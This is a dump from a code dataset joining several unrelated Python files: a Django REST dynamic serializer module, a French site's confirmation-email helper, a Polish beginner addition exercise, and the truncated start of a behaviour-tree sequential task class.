DynamicListSerializer(WithResourceKeyMixin, serializers.ListSerializer):\n    \"\"\"Custom ListSerializer class.\n\n    This implementation delegates DREST-specific methods to\n    the child serializer and performs post-processing before\n    returning the data.\n    \"\"\"\n\n    update_lookup_field = 'id'\n\n    def __init__(self, *args, **kwargs):\n        super(DynamicListSerializer, self).__init__(*args, **kwargs)\n        self.child.parent = self\n\n    def set_request_method(self, method):\n        return self.child.set_request_method(method)\n\n    def get_all_fields(self):\n        return self.child.get_all_fields()\n\n    def get_link_fields(self):\n        return self.child.get_link_fields()\n\n    def get_id_fields(self):\n        return self.child.get_id_fields()\n\n    def __iter__(self):\n        return self.child.__iter__()\n\n    def get_field(self, name):\n        return self.child.get_field(name)\n\n    @property\n    def fields(self):\n        return self.child.fields\n\n    def get_filters(self):\n        return self.child.get_filters()\n\n    def get_meta(self):\n        return self.child.get_meta()\n\n    def disable_envelope(self):\n        self.child.disable_envelope()\n        self._processed_data = None\n\n    def to_representation(self, data):\n        iterable = data.all() if isinstance(data, models.Manager) else data\n        return [self.child.to_representation(item) for item in iterable]\n\n    def get_description(self):\n        return self.child.get_description()\n\n    def resolve(self, query):\n        return self.child.resolve(query)\n\n
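    # Delegation note: every introspection hook below simply forwards to\n    # self.child, so list endpoints and detail endpoints answer metadata\n    # queries identically.\n    def get_name_field(self):\n        return 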
self.child.get_name_field()\n\n def get_class_getter(self):\n return self.child.get_class_getter()\n\n def get_search_key(self):\n return self.child.get_search_key()\n\n def get_icon(self):\n return self.child.get_icon()\n\n def get_url(self, pk=None):\n return self.child.get_url(pk=pk)\n\n def get_model(self):\n return self.child.get_model()\n\n def get_pk_field(self):\n return self.child.get_pk_field()\n\n def get_format(self):\n return self.child.get_format()\n\n def get_name(self):\n return self.child.get_name()\n\n def get_plural_name(self):\n return self.child.get_plural_name()\n\n def id_only(self):\n return self.child.id_only()\n\n @property\n def data(self):\n \"\"\"Get the data, after performing post-processing if necessary.\"\"\"\n if getattr(self, '_processed_data', None) is None:\n data = super(DynamicListSerializer, self).data\n self._processed_data = ReturnDict(\n SideloadingProcessor(self, data).data,\n serializer=self\n ) if self.child.envelope else ReturnList(\n data,\n serializer=self\n )\n return self._processed_data\n\n def update(self, queryset, validated_data):\n lookup_attr = getattr(self.child.Meta, 'update_lookup_field', 'id')\n\n lookup_objects = {\n entry.pop(lookup_attr): entry\n for entry in validated_data\n }\n\n lookup_keys = lookup_objects.keys()\n\n if not all((bool(_) and not inspect.isclass(_) for _ in lookup_keys)):\n raise exceptions.ValidationError('Invalid lookup key value.')\n\n # Since this method is given a queryset which can have many\n # model instances, first find all objects to update\n # and only then update the models.\n objects_to_update = queryset.filter(\n **{'{}__in'.format(lookup_attr): lookup_keys}\n )\n\n if len(lookup_keys) != objects_to_update.count():\n raise exceptions.ValidationError(\n 'Could not find all objects to update: {} != {}.'\n .format(len(lookup_keys), objects_to_update.count())\n )\n\n updated_objects = []\n for object_to_update in objects_to_update:\n lookup_key = getattr(object_to_update, lookup_attr)\n data = lookup_objects.get(lookup_key)\n # Use model serializer to actually update the model\n # in case that method is overwritten.\n updated_objects.append(self.child.update(object_to_update, data))\n\n return updated_objects\n\n\nclass WithDynamicSerializerMixin(\n PermissionsSerializerMixin,\n WithResourceKeyMixin,\n DynamicBase\n):\n \"\"\"Base class for DREST serializers.\n\n This class provides support for dynamic field inclusions/exclusions.\n\n Like DRF, DREST serializers support a few Meta class options:\n - model - class\n - name - string\n - plural_name - string\n - defer_many_relations - bool\n - fields - list of strings\n - deferred_fields - list of strings\n - immutable_fields - list of strings\n - read_only_fields - list of strings\n - untrimmed_fields - list of strings\n \"\"\"\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Custom constructor that sets the ListSerializer to\n DynamicListSerializer to avoid re-evaluating querysets.\n\n Addresses DRF 3.1.0 bug:\n https://github.com/tomchristie/django-rest-framework/issues/2704\n \"\"\"\n meta = getattr(cls, 'Meta', None)\n if not meta:\n meta = type('Meta', (), {})\n cls.Meta = meta\n list_serializer_class = getattr(\n meta, 'list_serializer_class', DynamicListSerializer)\n if not issubclass(list_serializer_class, DynamicListSerializer):\n list_serializer_class = DynamicListSerializer\n meta.list_serializer_class = list_serializer_class\n return super(\n WithDynamicSerializerMixin, cls\n ).__new__(\n cls, *args, **kwargs\n )\n\n def __init__(\n self,\n 
instance=None,\n            data=fields.empty,\n            only_fields=None,\n            include_fields=None,\n            exclude_fields=None,\n            request_fields=None,\n            sideloading=None,\n            debug=False,\n            dynamic=True,\n            embed=False,\n            envelope=False,\n            **kwargs\n    ):\n        \"\"\"\n        Custom initializer that builds `request_fields`.\n\n        Arguments:\n            instance: Initial instance, used by updates.\n            data: Initial data, used by updates / creates.\n            only_fields: List of field names to render.\n            include_fields: List of field names to include.\n            exclude_fields: List of field names to exclude.\n            request_fields: Map of field names that supports\n                nested inclusions / exclusions.\n            embed: If True, embed the current representation.\n                If False, sideload the current representation.\n            sideloading: If True, force sideloading for all descendents.\n                If False, force embedding for all descendents.\n                If None (default), respect descendents' embed parameters.\n            dynamic: If False, disable inclusion / exclusion features.\n            envelope: If True, wrap `.data` in an envelope.\n                If False, do not use an envelope.\n        \"\"\"\n        name = self.get_name()\n        if data is not fields.empty and name in data and len(data) == 1:\n            # support POST/PUT key'd by resource name\n            data = data[name]\n        if data is not fields.empty:\n            # if a field is nullable but not required and the implementation\n            # passes null as a value, remove the field from the data\n            # this addresses the frontends that send\n            # undefined resource fields as null on POST/PUT\n            for field_name, field in six.iteritems(self.get_all_fields()):\n                if (\n                    field.allow_null is False and field.required is False and\n                    field_name in data and data[field_name] is None\n                ):\n                    data.pop(field_name)\n\n        kwargs['instance'] = instance\n        kwargs['data'] = data\n\n        # \"sideload\" argument is pending deprecation\n        if kwargs.pop('sideload', False):\n            # if \"sideload=True\" is passed, turn on the envelope\n            envelope = True\n\n        super(WithDynamicSerializerMixin, self).__init__(**kwargs)\n\n        self.envelope = envelope\n        self.sideloading = sideloading\n        self.debug = debug\n        self.dynamic = dynamic\n        self.request_fields = request_fields or {}\n\n        # `embed` is overridden by `sideloading`\n        embed = embed if sideloading is None else not sideloading\n        self.embed = embed\n\n        self._dynamic_init(only_fields, include_fields, exclude_fields)\n        self.enable_optimization = settings.ENABLE_SERIALIZER_OPTIMIZATIONS\n\n    def _dynamic_init(self, only_fields, include_fields, exclude_fields):\n        \"\"\"\n        Modifies `request_fields` via higher-level dynamic field interfaces.\n\n        Arguments:\n            only_fields: List of field names to render.\n                All other fields will be deferred (respects sideloads).\n            include_fields: List of field names to include.\n                Adds to default field set, (respects sideloads).\n                `*` means include all fields.\n            exclude_fields: List of field names to exclude.\n                Removes from the default field set.\n
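                Example (illustrative): only_fields=['id', 'name'] defers\n                everything except those two fields, while\n                include_fields=['groups'] re-adds a normally deferred field\n                on top of the defaults.\n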
                If set to '*', all fields are removed, except for ones that\n                are explicitly included.\n        \"\"\"\n\n        if not self.dynamic:\n            return\n\n        if (isinstance(self.request_fields, dict) and\n                self.request_fields.pop('*', None) is False):\n            exclude_fields = '*'\n\n        only_fields = set(only_fields or [])\n        include_fields = include_fields or []\n        exclude_fields = exclude_fields or []\n        all_fields = set(self.get_all_fields().keys())\n\n        if only_fields:\n            exclude_fields = '*'\n            include_fields = only_fields\n\n        if exclude_fields == '*':\n            # First exclude all, then add back in explicitly included fields.\n            include_fields = set(\n                list(include_fields) + [\n                    field for field, val in six.iteritems(self.request_fields)\n                    if val or val == {}\n                ]\n            )\n            exclude_fields = all_fields - include_fields\n        elif include_fields == '*':\n            include_fields = all_fields\n\n        for name in exclude_fields:\n            self.request_fields[name] = False\n\n        for name in include_fields:\n            if not isinstance(self.request_fields.get(name), dict):\n                # not sideloading this field\n                self.request_fields[name] = True\n\n    def get_filters(self):\n        filters = getattr(self.get_meta(), 'filters', {})\n        return OrderedDict((\n            (name, Filter(name, value, serializer=self)) for name, value in\n            filters.items()\n        ))\n\n    def get_field_value(self, key, instance=None):\n        if instance == '':\n            instance = None\n\n        field = self.fields[key]\n        if hasattr(field, 'prepare_value'):\n            value = field.prepare_value(instance)\n        else:\n            value = field.to_representation(\n                field.get_attribute(instance)\n            )\n            if not isinstance(value, FieldFile):\n                if isinstance(value, list):\n                    value = [\n                        getattr(v, 'instance', v) for v in value\n                    ]\n                else:\n                    value = getattr(value, 'instance', value)\n        error = self.errors.get(key) if hasattr(self, '_errors') else None\n\n        if isinstance(field, JSONField):\n            return DynamicJSONBoundField(\n                field, value, error, prefix='', instance=instance\n            )\n        return DynamicBoundField(\n            field, value, error, prefix='', instance=instance\n        )\n\n    def get_pk_field(self):\n        try:\n            field = self.get_field('pk')\n            return field.field_name\n        except Exception:\n            pass\n        return 'pk'\n\n    @classmethod\n    def get_icon(cls):\n        meta = cls.get_meta()\n        return getattr(meta, 'icon', None)\n\n    @classmethod\n    def get_meta(cls):\n        return cls.Meta\n\n    def resolve(self, query):\n        \"\"\"Resolves a query into model and serializer fields.\n\n        Arguments:\n            query: an API field path, in dot-notation\n                e.g.: \"creator.location_name\"\n\n        Returns:\n            (model_fields, api_fields)\n            e.g.:\n            [\n                Blog._meta.fields.user,\n                User._meta.fields.location,\n                Location._meta.fields.name\n            ],\n            [\n                DynamicRelationField(source=\"user\"),\n                DynamicCharField(source=\"location.name\")\n            ]\n\n        Raises:\n            ValidationError if the query is invalid, e.g. 
references a method field or an undefined field.\n\n        Note that the lists do not necessarily contain the\n        same number of elements because API fields can reference\n        nested model fields.\n        \"\"\"  # noqa\n        if not isinstance(query, six.string_types):\n            parts = query\n            query = '.'.join(query)\n        else:\n            parts = query.split('.')\n\n        model_fields = []\n        api_fields = []\n\n        serializer = self\n\n        model = serializer.get_model()\n        resource_name = serializer.get_name()\n        meta = Meta(model)\n        api_name = parts[0]\n        other = parts[1:]\n\n        try:\n            api_field = serializer.get_field(api_name)\n        except Exception:\n            api_field = None\n\n        if other:\n            if not (\n                api_field and\n                isinstance(api_field, DynamicRelationField)\n            ):\n                raise ValidationError({\n                    api_name:\n                    'Could not resolve \"%s\": '\n                    '\"%s.%s\" is not an API relation' % (\n                        query,\n                        resource_name,\n                        api_name\n                    )\n                })\n\n            source = api_field.source or api_name\n            related = api_field.serializer_class()\n            other = '.'.join(other)\n            model_fields, api_fields = related.resolve(other)\n\n            try:\n                model_field = meta.get_field(source)\n            except AttributeError:\n                raise ValidationError({\n                    api_name:\n                    'Could not resolve \"%s\": '\n                    '\"%s.%s\" is not a model relation' % (\n                        query,\n                        meta.get_name(),\n                        source\n                    )\n                })\n\n            model_fields.insert(0, model_field)\n            api_fields.insert(0, api_field)\n        else:\n            if api_name == 'pk':\n                # pk is an alias for the id field\n                model_field = meta.get_pk_field()\n                model_fields.append(model_field)\n                if api_field:\n                    # the pk field may not exist\n                    # on the serializer\n                    api_fields.append(api_field)\n            else:\n                if not api_field:\n                    raise ValidationError({\n                        api_name:\n                        'Could not resolve \"%s\": '\n                        '\"%s.%s\" is not an API field' % (\n                            query,\n                            resource_name,\n                            api_name\n                        )\n                    })\n\n                api_fields.append(api_field)\n\n                if api_field.source == '*':\n                    # a method field was requested, model field is unknown\n                    return (model_fields, api_fields)\n\n                source = api_field.source or api_name\n
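                # A dotted source (e.g. source=\"user.location\" - illustrative)\n                # maps one API field onto a chain of model fields; walk each\n                # hop so callers get the full model-field path.\n                if '.' 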
in source:\n                    fields = source.split('.')\n                    for field in fields[:-1]:\n                        related_model = None\n                        try:\n                            model_field = meta.get_field(field)\n                            related_model = model_field.related_model\n                        except Exception:\n                            pass\n\n                        if not related_model:\n                            raise ValidationError({\n                                api_name:\n                                'Could not resolve \"%s\": '\n                                '\"%s.%s\" is not a model relation' % (\n                                    query,\n                                    meta.get_name(),\n                                    field\n                                )\n                            })\n                        model = related_model\n                        meta = Meta(model)\n                        model_fields.append(model_field)\n                    field = fields[-1]\n                    try:\n                        model_field = meta.get_field(field)\n                    except Exception:\n                        raise ValidationError({\n                            api_name:\n                            'Could not resolve \"%s\": '\n                            '\"%s.%s\" is not a model field' % (\n                                query,\n                                meta.get_name(),\n                                field\n                            )\n                        })\n                    model_fields.append(model_field)\n                else:\n                    try:\n                        model_field = meta.get_field(source)\n                    except Exception:\n                        raise ValidationError({\n                            api_name:\n                            'Could not resolve \"%s\": '\n                            '\"%s.%s\" is not a model field' % (\n                                query,\n                                meta.get_name(),\n                                source\n                            )\n                        })\n                    model_fields.append(model_field)\n\n        return (model_fields, api_fields)\n\n    def disable_envelope(self):\n        envelope = self.envelope\n        self.envelope = False\n        if envelope:\n            self._processed_data = None\n\n    @classmethod\n    def get_model(cls):\n        \"\"\"Get the model, if the serializer has one.\n\n        Model serializers should implement this method.\n        \"\"\"\n        return None\n\n    def get_field(self, field_name):\n        # it might be deferred\n        fields = self.get_all_fields()\n        if field_name == 'pk':\n            meta = self.get_meta()\n            if hasattr(meta, '_pk'):\n                return meta._pk\n\n            field = None\n            model = self.get_model()\n            primary_key = getattr(meta, 'primary_key', None)\n\n            if primary_key:\n                field = fields.get(primary_key)\n            else:\n                for n, f in fields.items():\n                    # try to use model fields\n                    try:\n                        # check the candidate `f`, not the (still-None) result\n                        if getattr(f, 'primary_key', False):\n                            field = f\n                            break\n\n                        model_field = get_model_field(\n                            model,\n                            f.source or n\n                        )\n\n                        if model_field.primary_key:\n                            field = f\n                            break\n                    except Exception:\n                        pass\n\n            if not field:\n                # fall back to a field called ID\n                if 'id' in fields:\n                    field = fields['id']\n\n            if field:\n                meta._pk = field\n                return field\n        else:\n            if field_name in fields:\n                field = fields[field_name]\n                return field\n\n        raise ValidationError({\n            field_name: '\"%s\" is not an API field' % field_name\n        })\n\n    def get_format(self):\n        view = self.context.get('view')\n        get_format = getattr(view, 'get_format', None)\n        if callable(get_format):\n            return get_format()\n        return None\n\n    @classmethod\n    def get_name(cls):\n        \"\"\"Get the serializer name.\n\n        The name can be defined on the Meta class or will be generated\n        automatically from the model name.\n        \"\"\"\n        if not hasattr(cls.Meta, 'name'):\n            class_name = getattr(cls.get_model(), '__name__', None)\n            setattr(\n                cls.Meta,\n                'name',\n                inflection.underscore(class_name) if class_name else None\n            )\n\n        return cls.Meta.name\n\n    @classmethod\n    def get_url(cls, pk=None):\n        # if associated with a registered viewset, use its URL\n        url = getattr(cls, '_url', None)\n        if url:\n            # use URL key to get endpoint\n            url = reverse(url)\n        if not url:\n            # otherwise, return canonical URL for this model\n            from dynamic_rest.routers import DynamicRouter\n            url = DynamicRouter.get_canonical_path(\n                cls.get_resource_key()\n            )\n        if pk:\n            return '%s/%s/' % (url, pk)\n        return url\n\n    @classmethod\n    def get_description(cls):\n        return getattr(cls.Meta, 'description', None)\n\n    @classmethod\n    def get_class_getter(cls):\n        meta = cls.get_meta()\n        return getattr(meta, 'get_classes', None)\n\n    @classmethod\n    def get_name_field(cls):\n        if not hasattr(cls.Meta, 'name_field'):\n
            # fall back to the primary key\n            return 'pk'\n        return cls.Meta.name_field\n\n    @classmethod\n    def get_search_key(cls):\n        meta = cls.get_meta()\n        if hasattr(meta, 'search_key'):\n            return meta.search_key\n\n        # fallback to name field\n        name_field = cls.get_name_field()\n        if name_field:\n            return 'filter{%s.icontains}' % name_field\n\n        # fallback to PK\n        return 'pk'\n\n    @classmethod\n    def get_plural_name(cls):\n        \"\"\"Get the serializer's plural name.\n\n        The plural name may be defined on the Meta class.\n        If the plural name is not defined,\n        the pluralized form of the name will be returned.\n        \"\"\"\n        if not hasattr(cls.Meta, 'plural_name'):\n            setattr(\n                cls.Meta,\n                'plural_name',\n                inflection.pluralize(cls.get_name())\n            )\n        return cls.Meta.plural_name\n\n    def get_request_attribute(self, attribute, default=None):\n        return getattr(\n            self.context.get('request'),\n            attribute,\n            default\n        )\n\n    def set_request_method(self, method=None):\n        self._request_method = method\n\n    def get_request_method(self):\n        if getattr(self, '_request_method', None):\n            return self._request_method\n        else:\n            return self.get_request_attribute(\n                'method',\n                ''\n            ).upper()\n\n    def get_all_fields(self):\n        \"\"\"Returns the entire serializer field set.\n\n        Does not respect dynamic field inclusions/exclusions.\n        \"\"\"\n        if not hasattr(self, '_all_fields'):\n            self._all_fields = super(\n                WithDynamicSerializerMixin,\n                self\n            ).get_fields()\n            for k, field in six.iteritems(self._all_fields):\n                field.field_name = k\n                label = inflection.humanize(k)\n                field.label = getattr(field, 'label', label) or label\n                field.parent = self\n        return self._all_fields\n\n    def _get_flagged_field_names(self, fields, attr, meta_attr=None):\n        meta = self.get_meta()\n        if meta_attr is None:\n            meta_attr = '%s_fields' % attr\n        meta_list = set(getattr(meta, meta_attr, []))\n        return {\n            name for name, field in six.iteritems(fields)\n            if getattr(field, attr, None) is True or name in\n            meta_list\n        }\n\n    def _get_deferred_field_names(self, fields):\n        meta = self.get_meta()\n        deferred_fields = self._get_flagged_field_names(\n            fields,\n            'deferred'\n        )\n\n        defer_many_relations = (\n            settings.DEFER_MANY_RELATIONS\n            if not hasattr(meta, 'defer_many_relations')\n            else meta.defer_many_relations\n        )\n        if defer_many_relations:\n            # Auto-defer all fields, unless the 'deferred' attribute\n            # on the field is specifically set to False.\n            many_fields = self._get_flagged_field_names(fields, 'many')\n            deferred_fields.update({\n                name for name in many_fields\n                if getattr(fields[name], 'deferred', None) is not False\n            })\n\n        return deferred_fields\n\n    def flag_fields(self, all_fields, fields_to_flag, attr, value):\n        for name in fields_to_flag:\n            field = all_fields.get(name)\n            if not field:\n                continue\n            setattr(field, attr, value)\n\n    def get_fields(self):\n        \"\"\"Returns the serializer's field set.\n\n        If `dynamic` is True, respects field inclusions/exclusions.\n        Otherwise, reverts back to standard DRF behavior.\n        \"\"\"\n        all_fields = self.get_all_fields()\n        if self.dynamic is False:\n            return all_fields\n\n        if self.id_only():\n            return {}\n\n        serializer_fields = copy.deepcopy(all_fields)\n        request_fields = self.request_fields\n        deferred = self._get_deferred_field_names(serializer_fields)\n
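        # Resolution order (explanatory note): request-level flags override\n        # Meta-level deferral - e.g. (illustrative) ?include[]=groups clears a\n        # deferred flag, while an explicit include=False re-defers the field.\n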
        # apply request overrides\n        if request_fields:\n            if request_fields is True:\n                request_fields = {}\n            for name, include in six.iteritems(request_fields):\n                if name not in serializer_fields and name != 'pk':\n                    raise exceptions.ParseError(\n                        '\"%s\" is not a valid field name for \"%s\".' %\n                        (name, self.get_name())\n                    )\n                if include is not False and name in deferred:\n                    deferred.remove(name)\n                elif include is False:\n                    deferred.add(name)\n\n        for name in deferred:\n            serializer_fields.pop(name)\n\n        # Set read_only flags based on read_only_fields meta list.\n        # Here to cover DynamicFields not covered by DRF.\n        meta = self.get_meta()\n        ro_fields = getattr(meta, 'read_only_fields', [])\n        self.flag_fields(serializer_fields, ro_fields, 'read_only', True)\n\n        pw_fields = getattr(meta, 'untrimmed_fields', [])\n        self.flag_fields(\n            serializer_fields,\n            pw_fields,\n            'trim_whitespace',\n            False,\n        )\n\n        method = self.get_request_method()\n        # Toggle read_only flags for immutable fields.\n        # Note: This overrides `read_only` if both are set, to allow\n        # inferred DRF fields to be made immutable.\n        immutable_field_names = self._get_flagged_field_names(\n            serializer_fields,\n            'immutable'\n        )\n        self.flag_fields(\n            serializer_fields,\n            immutable_field_names,\n            'read_only',\n            value=method in ('PUT', 'PATCH')\n        )\n        # Toggle read_only for only-update fields\n        only_update_field_names = self._get_flagged_field_names(\n            serializer_fields,\n            'only_update'\n        )\n        self.flag_fields(\n            serializer_fields,\n            only_update_field_names,\n            'read_only',\n            # ('POST',) must be a tuple - a bare ('POST') is just a string\n            # and would turn this into a substring test\n            value=method in ('POST',)\n        )\n        return serializer_fields\n\n    def is_field_sideloaded(self, field_name):\n        if not isinstance(self.request_fields, dict):\n            return False\n        return isinstance(self.request_fields.get(field_name), dict)\n\n    def get_link_fields(self):\n        \"\"\"Construct dict of name:field for linkable fields.\"\"\"\n        if not hasattr(self, '_link_fields'):\n            query_params = self.get_request_attribute('query_params', {})\n            if 'exclude_links' in query_params:\n                self._link_fields = {}\n            else:\n                all_fields = self.get_all_fields()\n                self._link_fields = {\n                    name: field for name, field in six.iteritems(all_fields)\n                    if isinstance(field, DynamicRelationField) and\n                    getattr(field, 'link', True) and\n                    not (\n                        # Skip sideloaded fields\n                        name in self.fields and\n                        self.is_field_sideloaded(name)\n                    )\n                }\n\n        return self._link_fields\n\n    @cached_property\n    def _readable_fields(self):\n        # NOTE: Copied from DRF, exists in 3.2.x but not 3.1\n        return [\n            field for field in self.fields.values()\n            if not field.write_only\n        ]\n\n    def _faster_to_representation(self, instance):\n        \"\"\"Modified to_representation with optimizations.\n\n        1) Returns a plain old dict as opposed to OrderedDict.\n           (Constructing an ordered dict is ~100x slower than `{}`.)\n        2) Ensure we use a cached list of fields\n           (this optimization exists in DRF 3.2 but not 3.1)\n\n        Arguments:\n            instance: a model instance or data object\n        Returns:\n            Dict of primitive datatypes.\n        \"\"\"\n\n        ret = {}\n        fields = self._readable_fields\n\n        for field in fields:\n            try:\n                attribute = field.get_attribute(instance)\n            except SkipField:\n                continue\n\n            if attribute is None:\n                # We skip `to_representation` for `None` values so that\n                # fields do not have to explicitly deal with that case.\n                ret[field.field_name] = None\n            else:\n                ret[field.field_name] = field.to_representation(attribute)\n\n        return ret\n\n    def is_root(self):\n        return self.parent is None\n\n    def to_representation(self, instance):\n        \"\"\"Modified to_representation method.\n\n        Arguments:\n            instance: A model instance or data object.\n        Returns:\n            Instance ID if the serializer is meant to represent its ID.\n            Otherwise, a tagged data dict representation.\n        \"\"\"\n        id_only = self.id_only()\n        if (\n            self.get_format() == 'admin' and\n            self.is_root()\n        ):\n            id_only = False\n        if 
id_only:\n return instance.pk\n else:\n if self.enable_optimization:\n representation = self._faster_to_representation(instance)\n else:\n representation = super(\n WithDynamicSerializerMixin,\n self\n ).to_representation(instance)\n\n query_params = self.get_request_attribute('query_params', {})\n if (\n settings.ENABLE_LINKS and\n 'exclude_links' not in query_params\n ):\n representation = merge_link_object(\n self, representation, instance\n )\n\n if self.debug:\n representation['_meta'] = {\n 'id': instance.pk,\n 'type': self.get_plural_name()\n }\n\n # tag the representation with the serializer and instance\n return tag_dict(\n representation,\n serializer=self,\n instance=instance,\n embed=self.embed\n )\n\n def to_internal_value(self, data):\n meta = self.get_meta()\n value = super(WithDynamicSerializerMixin, self).to_internal_value(data)\n\n id_attr = getattr(meta, 'update_lookup_field', 'id')\n request_method = self.get_request_method()\n\n # Add update_lookup_field field back to validated data\n # since super by default strips out read-only fields\n # hence id will no longer be present in validated_data.\n if all((\n isinstance(self.root, DynamicListSerializer),\n id_attr,\n request_method in ('PUT', 'PATCH')\n )):\n id_field = self.fields[id_attr]\n id_value = id_field.get_value(data)\n value[id_attr] = id_value\n\n return value\n\n def add_post_save(self, fn):\n if not hasattr(self, '_post_save'):\n self._post_save = []\n self._post_save.append(fn)\n\n def do_post_save(self, instance):\n if hasattr(self, '_post_save'):\n for fn in self._post_save:\n fn(instance)\n self._post_save = []\n\n def update(self, instance, validated_data):\n # support nested writes if possible\n meta = Meta(instance)\n to_save = [instance]\n # Simply set each attribute on the instance, and then save it.\n # Note that unlike `.create()` we don't need to treat many-to-many\n # relationships as being a special case. 
During updates we already\n # have an instance pk for the relationships to be associated with.\n try:\n\n with transaction.atomic():\n for attr, value in validated_data.items():\n try:\n field = meta.get_field(attr)\n if field.related_model:\n if isinstance(value, dict):\n # nested dictionary on a has-one\n # relationship, we should take the current\n # related value and apply updates to it\n to_save.extend(\n nested_update(instance, attr, value)\n )\n else:\n # normal relationship update\n setattr(instance, attr, value)\n else:\n setattr(instance, attr, value)\n except AttributeError:\n setattr(instance, attr, value)\n\n for s in to_save:\n s.save()\n except Exception as e:\n raise exceptions.ValidationError(e)\n\n return instance\n\n def save(self, *args, **kwargs):\n \"\"\"Serializer save that addresses prefetch issues.\"\"\"\n update = getattr(self, 'instance', None) is not None\n try:\n instance = super(\n WithDynamicSerializerMixin,\n self\n ).save(\n *args,\n **kwargs\n )\n except exceptions.APIException as e:\n if self.debug:\n import traceback\n traceback.print_exc()\n\n raise\n except Exception as e:\n if self.debug:\n import traceback\n traceback.print_exc()\n\n error = e.args[0] if e.args else str(e)\n if not isinstance(error, dict):\n error = {'error': error}\n self._errors = error\n raise exceptions.ValidationError(\n self.errors\n )\n self.do_post_save(instance)\n\n view = self._context.get('view')\n if update and view:\n # Reload the object on update\n # to get around prefetch cache issues\n instance = self.instance = view.get_object()\n return instance\n\n def id_only(self):\n \"\"\"Whether the serializer should return an ID instead of an object.\n\n Returns:\n True if and only if `request_fields` is True.\n \"\"\"\n return (\n self.dynamic and\n self.request_fields is True\n )\n\n @property\n def data(self):\n if getattr(self, '_processed_data', None) is None:\n data = super(WithDynamicSerializerMixin, self).data\n data = SideloadingProcessor(\n self, data\n ).data if self.envelope else data\n self._processed_data = ReturnDict(\n data,\n serializer=self\n )\n return self._processed_data\n\n\nclass WithDynamicModelSerializerMixin(WithDynamicSerializerMixin):\n\n \"\"\"Adds DREST serializer methods specific to model-based serializers.\"\"\"\n\n @classmethod\n def get_model(cls):\n return getattr(cls.Meta, 'model', None)\n\n def get_id_fields(self):\n \"\"\"\n Called to return a list of fields consisting of, at minimum,\n the PK field name. 
The output of this method is used to\n construct a Prefetch object with a .only() queryset\n when this field is not being sideloaded but we need to\n return a list of IDs.\n \"\"\"\n model = self.get_model()\n meta = Meta(model)\n\n out = [meta.get_pk_field().attname]\n\n # If this is being called, it means it\n # is a many-relation to its parent.\n # Django wants the FK to the parent,\n # but since accurately inferring the FK\n # pointing back to the parent is less than trivial,\n # we will just pull all ID fields.\n # TODO: We also might need to return all non-nullable fields,\n # or else it is possible Django will issue another request.\n for field in meta.get_fields():\n if isinstance(field, models.ForeignKey):\n out.append(field.attname)\n\n return out\n\n\nclass DynamicModelSerializer(\n WithDynamicModelSerializerMixin,\n serializers.ModelSerializer\n):\n\n \"\"\"DREST-compatible model-based serializer.\"\"\"\n pass\n\n\nclass EphemeralObject(object):\n\n \"\"\"Object that initializes attributes from a dict.\"\"\"\n\n def __init__(self, values_dict):\n if 'pk' not in values_dict:\n raise Exception('\"pk\" key is required')\n self.__dict__.update(values_dict)\n\n\nclass DynamicEphemeralSerializer(\n WithDynamicSerializerMixin,\n serializers.Serializer\n):\n\n \"\"\"DREST-compatible baseclass for non-model serializers.\"\"\"\n\n def to_representation(self, instance):\n \"\"\"\n Provides post processing. Sub-classes should implement their own\n to_representation method, but pass the resulting dict through\n this function to get tagging and field selection.\n\n Arguments:\n instance: Serialized dict, or object. If object,\n it will be serialized by the super class's\n to_representation() method.\n \"\"\"\n\n if not isinstance(instance, dict):\n data = super(\n DynamicEphemeralSerializer,\n self\n ).to_representation(instance)\n else:\n data = instance\n instance = EphemeralObject(data)\n\n if self.id_only():\n return data\n else:\n return tag_dict(data, serializer=self, instance=instance)\n","sub_path":"dynamic_rest/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":41555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"351580661","text":"# coding: utf-8\nfrom django.core.mail import send_mass_mail\nfrom django.conf import settings\n\nmessage = {\n \"contact\": '''\\\nBonjour,\n\nVotre commentaire sur le site www.uxperiment.fr a bien été pris en compte.\n\nNous vous remercions de votre participation.\n\nA bientôt,\n\nL'équipe UXperiment\n''',\n \"suggest\": '''\\\nBonjour,\n\nVotre proposition de site internet sur le site www.uxperiment.fr a bien été pris en compte.\n\nNous vous remercions de votre participation.\n\nA bientôt,\n\nL'équipe UXperiment\n''',\n}\n\ndef send_message(confirm, data):\n send_mass_mail((build_user_email(confirm, data['sender']), \n build_admin_email(confirm, data)))\n\ndef build_user_email(confirm, recipient):\n \"\"\" Build user message in form of send_mail \"\"\"\n text = message[confirm]\n if confirm == 'suggest':\n subject = 'Confirmation de votre proposition sur UXperiment'\n if confirm == 'contact':\n subject = 'Commentaire sur UXperiment'\n if confirm == 'signin':\n subject = 'Confirmation d\\'inscription sur UXperiment'\n\n return subject, text, settings.EMAIL_HOST_USER, [recipient]\n\ndef build_admin_email(confirm, data):\n \"\"\" Build admin message in form of send_mail \"\"\"\n if confirm == 'suggest':\n subject = 'Nouvelle proposition de site sur UXperiment'\n text = 
'L\\'utilisateur : %s, vient de proposer le site %s'\\\n            % (data['username'], data['website'])\n\n    if confirm == 'contact':\n        subject = 'Nouveau contact sur UXperiment'\n        text = '''\\\nEmail : %s\nSujet : %s\nMessage :\n%s''' % (data['sender'], data['subject'], data['message'])\n\n    return subject, text, settings.EMAIL_HOST_USER, [settings.EMAIL_RECIPIENT]\n","sub_path":"uxperiment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"642200765","text":"def dodawanie(a: int, b: int):\n    print(\"Wynik dodawania tych dwóch liczb to:\", a + b)\n    print(\"Świetna aplikacja dodająca\")\n    print(\"To jest funkcja\")\n\n# input() returns str, so cast to int - otherwise a + b concatenates strings\nx = int(input(\"Podaj pierwszą liczbę do dodania: \"))\ny = int(input(\"Podaj drugi składnik sumy: \"))\n\ndodawanie(x, y)\ndodawanie(y, x)","sub_path":"25Funkcje.py","file_name":"25Funkcje.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"285249829","text":"import smach\nfrom smach_bt.task import Task\nfrom smach_bt.container import ContainerTask\n\nclass SequentialTask(ContainerTask):\n    def __init__(self, stop_result, continue_result, label=None, input_keys=[], output_keys=[], io_keys=[]):\n        ContainerTask.__init__(self, label=label, input_keys=input_keys, output_keys=output_keys, io_keys=io_keys)\n        self._initial_task_idx = 0\n        self._active_task_idx = None\n        self._stop_result = 